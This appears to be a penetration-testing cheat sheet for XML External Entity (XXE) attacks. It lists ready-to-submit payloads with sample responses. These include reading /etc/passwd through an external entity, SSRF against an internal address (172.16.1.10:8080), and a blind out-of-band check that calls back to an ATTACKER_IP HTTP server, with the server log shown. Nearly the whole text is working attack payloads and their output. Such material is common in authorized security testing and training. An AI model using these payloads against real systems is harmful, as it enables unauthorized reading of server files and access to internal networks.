XML EXTERNAL ENTITY (XXE)
Test for XXE
Submit in XML inputs — APIs, file uploads, SOAP
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Example Output
Submit XML:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Response includes:
root:x:0:0:root:/root:/bin/bash
(XXE CONFIRMED - can read files)
XXE to read files
Read local files — LFI via XML parser
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Example Output
Submit:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>&xxe;</user>
Response:
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:...
(File read via XXE)
XXE SSRF
Access internal services — Pivot to internal network
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-host/">]>
Example Output
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://172.16.1.10:8080/">]>
<root>&xxe;</root>
Response includes internal page content
(Access internal services through XXE)
Blind XXE (out-of-band)
Confirm with HTTP callback — If no output in response
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://ATTACKER_IP:8000/xxe">]>
Example Output
Submit:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://ATTACKER_IP:8000/gotcha">]>
Attacker HTTP server:
10.10.10.5 - - 'GET /gotcha HTTP/1.1' 200 -
(Confirms XXE even with no visible output)